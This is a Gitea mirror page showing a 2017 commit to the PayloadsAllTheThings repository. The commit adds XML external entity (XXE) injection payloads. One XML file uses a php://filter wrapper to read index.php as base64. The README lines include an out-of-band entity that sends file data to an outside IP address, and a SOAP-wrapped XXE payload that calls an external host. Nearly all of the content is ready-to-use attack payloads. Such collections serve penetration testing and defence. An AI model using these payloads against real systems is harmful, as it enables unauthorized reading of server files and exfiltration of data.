gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-03-01 15:03:12 -08:00
Code Issues Packages Projects Releases Wiki Activity

SSRF URL Scheme + XXE Soap

Browse Source
This commit is contained in:
Swissky
2017-08-07 21:42:14 +02:00
parent 91e3c6906c
commit 9adb81e6d8
3 changed files with 43 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
XXE injections/Files/XXE PHP Wrapper.xml Normal file
View File

@@ -0,0 +1,10 @@
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
<contact>
<name>Jean &xxe; Dupont</name>
<phone>00 11 22 33 44</phone>
<adress>42 rue du CTF</adress>
<zipcode>75000</zipcode>
<city>Paris</city>
</contact>
</contacts>

7
XXE injections/README.md
View File

@@ -96,6 +96,13 @@ File stored on http://92.222.81.2/dtd.xml
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://92.222.81.2/dtd.xml?%data;'>">
```
XXE Inside SOAP
```
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
```
## Thanks to
* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html
* https://gist.github.com/staaldraad/01415b990939494879b4